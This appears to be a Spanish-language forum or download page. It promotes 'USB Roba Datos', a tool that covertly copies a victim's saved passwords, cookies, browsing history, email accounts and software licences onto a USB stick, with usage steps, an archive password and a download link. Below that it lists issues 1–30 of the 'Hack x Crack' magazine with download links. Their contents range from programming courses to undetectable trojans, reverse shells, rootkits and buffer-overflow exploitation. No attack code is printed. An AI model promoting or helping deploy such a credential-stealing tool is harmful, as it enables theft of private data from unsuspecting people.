All Rights Reserved
|
![]() |
|||||||||
![]() USB Roba DatoS ![]() Este programa no necesita su presentación ya que lo dice su titulo USB ROBA DATOS o sea que puedes robar datos con una memoria USB del ordenador en donde se haya introducido la memoria y estos datos pueden ser : -toda clase de contraseñas del navegador web hi-5,myspace, e incluso de foros.. - historial de navegacion completo ( para darte cuenta del perfil de la victima y o amiga ) -cookies esto sabran mis amigos mas experimentados para lo que sirve -los clientes de correo tales como msn , yahoo, gmail y demas -toda la informacion de su hardware e ips -los púertos abiertos recientemente -licencias de los programas que tiene (incluidos windos ,adobe y demas) y otras cositas mas PASOS A SEGUIR:
4* Debes esperar unos 5-10 o mas min para que te haga el trabajo sucio (para que te robe la información). 5* Pasado este tiempo ya la puedes retirar y llevartela donde puedas gozar de esta información.(de los 5 archivos ay una carpeta que se llama Dump ,pues dentro estará una carpeta con el nombre del ordenador donde as introducido la memoria,pues abrela y eso es lo que te a robado. Si introduces en otro ordenata se creara otra carpeta y así susecivamente.... Dicen que algunos antivírus te llaman la etención a mi no me a sucedido salvo cuando e abierto la carpeta Dump cuando estado en la máquina víctima . Ojo .No lleva vírus ni cosas extrañas si es detectado por algun antivirus sera por los archivos que contiene. Contraseña: gasparin4 http://www.megaupload.com/?d=PAMS4DI6 Product by: X-CALETA
CUADERNOS HACk CRACk Cuaderno 1
-Crea tu primer troyano indetectable por los antivirus -FXP:sin limite de velocidad, utilizando conexiones ajenas -Los secretos del FTP -Esquivando firewalls -Pass mode versus port mode http://www.megaupload.com/?d=Q7C63E2N Cuaderno 2 -Code/decode bug (como hackear servidores paso a paso) -Ocultacion de ip: primeros pasos -Aznar al frente de la gestapo digital http://www.megaupload.com/?d=O2TMY9Y3 Cuaderno 3 -Ocultando nuestra ip, encadenando proxys -proxy: ocultando todos nuestros programas tras las cadenas de proxies -practicas de todo lo aprendido http://www.megaupload.com/?d=PDSDTMRC Cuaderno 4 -Crea tu segundo troyano indetectable e inmune a los antivirus -Radmin: remote administrator 2.1, un controlador remoto a medida http://www.megaupload.com/?d=669B8IGP Cuaderno 5 -Aprende a compilar, paso obligado antes de explicarte los exploits -Rootkits, sin defensa posible -penetracion de sistemas por netbios -compilacion del netcat con opciones "especiales" -netbios: un agujero de seguridad no reconocido por microsoft -La censurado en internet http://www.megaupload.com/?d=E9KT0L2H Cuaderno 6 -Curso de visual basic: aprende a programar desde 0 -Ficheros Stream (invisibles, peligrosos y ejecutables) -Rippeando videos Divx, El rey -Ocultacion avanzada de ficheros en windows xp -Listado de puertos y Servicios: imprescindible!!! -IPHXC: El tercer troyano de hack x crack (parte 1) -Trasteando con el hardware de una lan http://www.megaupload.com/?d=9KJP5PVB Cuaderno 7: -Apache, El mejor servidor web- transforma tu pc en un servidor web -El cuarto troyano de Hack x Crack: El CCPROXY, un servidor oculto para anonimizar nuestras conexiones -IPHXC (segunda parte) nuestro tercer troyano -La inseguridad del protocolo POP3: Capturando las claves de nuestra cuenta de correo Los primeros pasos con IRIS (sniffando la red) -Accede por Telnet a servidores POP3, entendiendo los protocolos -Curso de visual basic, segunda entrega -Rippeando (2ª parte) el audio: AC3 -- MP3 --OGG -Consigue una cuenta POP3 gratis http://www.megaupload.com/?d=Q81UCNLZ Cuaderno 8: -Linux: Netcat Perl "pipes" -Reverse shell, burlando al firewall -Encadenando programas -Penetracion inversa en PCs remotos -SMTP: descubre los protocolos de internet -Apache: Configuracion, comparte ficheros desde tu propio servidor web -Jugando de nuevo con el NETCAT -SERIE RAW: protocolos -Visual Basic: "Arrray de controles" "vectores" "ocx" http://www.megaupload.com/?d=Z0MT5FQ7 Cuaderno 9: -NMAP: El mejor escaneador de internet: instacion, interfaz grafica, opciones de uso -Iniciacion al PORT SCANNING - Tecnicas de "scaneo" -Serie RAW: IRC - Internet Relay Chat -Chateando mediante Telnet -GNU Linux- Permisos de archivo CAT y otros comandos -APACHE- Modulos y servidores virtuales -Descubre los protocolos de "la red" con nosotros -VISUAL BASIC - Creando librerias. Acceso a datos http://www.megaupload.com/?d=1IU28ZQ1 Cuaderno 10: -GNU LINUX- Gestion de usuarios, editores de texto: "VI" -Serie Raw: Conociendo protocolos y su seguridad -Curso de Visual Basic (V) acceso a datos II, -XML: el futuro de la transferencia de datos -Apache parte IV, trio de ases: APACHE- PHP- MYSQL http://www.megaupload.com/?d=3ESPYIYM Cuaderno 11: -Programacion en GNU Linux: Bash Scripting y C -Serie Raw: entendiendo los protocolos y su seguridad; Raw 5: FTP (File transfer protocol) -Intrusión en redes de área local, la pesadilla de todo administrador -Apache parte V: Configura tu servidor apache como servidor proxy -Validacion de documentos XML: DTD primera parte: creacion de DTDS -Curso de Visual Basic (VII) IIS Bug exploit: usando el webbrowser -Augusta Ada Byron, Lady Lovelace (1815-1852) el primer programa http://www.megaupload.com/?d=DO3FAK31 Cuaderno 12: -Explotando los servidores FTP:atravesando firewalls por ftp: aprende a utilizar los servidores ftp como anonimizadores!!! -Raw 6: FTP segunda parte -Servidor Web Apache: Protege tu apache configurandolo de forma segura: restriccion de accesos - autentificacion - analizando a nuestros visitantes - logs codificación - HTPASSWD - Cortafuegos -Visual Studio.net: crea tu propia herramienta de cracking -Validacion de documentos XML: DTD segunda parte, atributos y elementos -IIS bug exploit, nuestro primer scanner -Programacion en GNU/Linux, desarrollo de aplicaciones en entornos unix e iniciación al lenguaje C http://www.megaupload.com/?d=LUI35XGE Cuaderno 13: -Manipulación de documentos XML: El Dom, 1ª parte: teoria del Dom e intterfaz Domdocument -Programación en GNU/Linux, desarrollo de aplicaciones en entornos unix e iniciación al lenguaje C -Curso de Visual Basic: un cliente, una necesidad, tenemos un proyecto (parte I) -RAW 7: HTTP (Hypertext Transfer Protocol) -Port Scanning: Escaneando ordenadoros Remotos: tipos de scaneos http://www.megaupload.com/?d=WYZWPWLJ Cuaderno 14: -Curso de PHP, empezamos a programar, PHP (1) -Serie RAW (8) DNS - Domain Name System -Curso de Visual Basic, un cliente, una necesidad, un proyecto, (parte II) -Programación en GNU Linux, desarrollo de aplicaciones en entornos unix e iniciación al lenguaje C (III) -Manipulacion de documentos XML: El Dom 2ª parte. Interfaz XMLDOMNODE (I) -Tecnicas de Hijacking http://www.megaupload.com/?d=J1YKRT1E Cuaderno 15: -Curso de PHP (II) Aprende a programar tu propio generador de IPs -Serie XBOX Life, instalando Linux en una Xbox -RAW 9: MSN (Microsoft Messenger) -Curso de Visual Basic, Un cliente, una necesidad, un proyecto, (parte III) -Programación en GNU Linux, desarrollo de aplicaciones en entornos unix e iniciación al lenguaje C (IV) http://www.megaupload.com/?d=VYOHTXZX Cuaderno 16: -Curso PHP: Aprende a manejar ficheros con PHP -Programación en GNU Linux, programación del sistema: El sistema I.P.C. -Manipulación de documentos XML: El DOM tercera parte -Serie XBOX LIFE: EVOLUTION X tu mejor amigo -RAW 10 - NNTP (Usenet) http://www.megaupload.com/?d=A41LLCF5 Cuaderno 17: -Hackeando un servidor Windows en 40 segundos!!! -Programación en GNU Linux: programación del sistema, el sistema I.P.C (II) -Curso de TCP/IP, introducción -Curso de PHP, (4ª entrega) Aprende a manejar cadenas de texto en PHP -Serie XBOX LIFE (III) Cambiando el disco duro y parcheando juegos http://www.megaupload.com/?d=U4IRPG97 Cuaderno 18: -Curso de PHP, manejo de formularios web -Serie XBOX LIFE (IV) Convirtiendo nuestra xbox en un centro multimedia -Programación en GNU Linux, memoria compartida -Curso de TCP/IP (2ª entrega) El protocolo de transporte UDP (protocolo de datagramas de usuario) -El lenguaje XSL, transformacion del documento XML -La realidad de los virus informáticos http://www.megaupload.com/?d=00MF07K7 Cuaderno 19: -Programación en Gnu Linux, colas de mensajes -XBOX LIFE V - Jugando online gratis -Crackeando las restricciones de seguridad de windows -Curso de seguridad en redes - IDS -Curso de PHP - Aprende a manejar sockets con PHP http://www.megaupload.com/?d=7SUD98KS Cuaderno 20: -Curso de PHP: Aprende a manejar sesiones -Curso de TCP/IP (3ª entrega) TCP, 1ª parte -XBOX LIFE VI, Menu X -Curso de seguridad en redes - IDS (II) http://www.megaupload.com/?d=69DSL6RF Cuaderno 21: -Trabajando con bases de datos en PHP -Curso de TCP/IP: 4ª entrega: TCP 2ª parte -IDS, Sistema de Detección de Intrusos, tercera entrega, pluggins de salida en SNORT -XBOX LIFE VII, Creando nuestro Slayer http://www.megaupload.com/?d=99MT0N59 Cuaderno 22: -Asaltando foros: guia paso a paso -Firewalls: Qué son, cómo funcionan y cómo saltárselos http://www.megaupload.com/?d=NGEQVH3B Cuaderno 23: -Cómo explotar fallos Buffer Overflow -Curso de TCP/IP: ICMP (protocolo de mensajes de control de internet) -Diseño de cortafuegos (parte II) http://www.megaupload.com/?d=4NJG491B Cuaderno 24: -Los bugs y los exploits, esos pequeños bichos y diablos -Curso de TCP/IP: La capa IP primera parte. Las direcciones IP -Hacking de Linux -Diseño de cortafuegos de red con iptables (3ª parte del curso de firewalls) http://www.megaupload.com/?d=J9WGT9F1 Cuaderno 25: -Los bugs y los exploits, esos pequeños bichos y diablos, segunda parte -Vulnerabilidades Web, atacando la sesión de usuario -Curso de TCP IP: La capa IP, segunda parte, (los datagramas) http://www.megaupload.com/?d=XRXTCUUR Cuaderno 26: -Sombras en internet: sniffando la red - formas de detección - utilidades para la detección -ethereal: descripción. Capturando tráfico. Estableciendo filtros. Capturando información sensible. Telnet vs Secure shell -Atacando la caché DNS -Curso de TCP IP: La capa IP 3ª parte: fragmentación de datagramas http://www.megaupload.com/?d=80MKP1U7 Cuaderno 27: -Taller de Python "episodio 1" -Taller de Criptografía - El sistema PGP -Curso de TCP IP: protección con iptables, en una red corporativa -Buffer Overflow -Hackeando el núcleo http://www.megaupload.com/?d=G5HRIU0N Cuaderno 28: -Hacking Estragegia, capitulo 1 -Curso de Python, capitulo 2 -Investigación, poniendo a prueba el antivirus -Explotando Heap/BSS Overflows, capitulo 2 -Programación, curso de C, capitulo 1 -Taller de criptografía, capitulo 2 -La "ley de la mordaza": informar es DELITO http://www.megaupload.com/?d=56P5GKOH Cuaderno 29: -Hacking estrategia: infiltración en una red wireless protegida -Capitulo III: Taller de criptografía -Control de Logs en GNU/LINUX -Explotación de las Format Strings, capitulo III -Shatter Attacks -Curso de C, capitulo II -FAQ, curiosidades de Gmail/Google http://www.megaupload.com/?d=FGVC4G7K Cuaderno 30: -Taller de criptografía, capitulo IV -Ataques a formularios web -Los secretos del protocolo SOCKS -Creamos una Shellcode paso a paso -Capitulo III: Curso de C: Punteros y Arrays -Hack mundial http://www.megaupload.com/?d=KXCE8VYB |
|
|||||||||
![]() |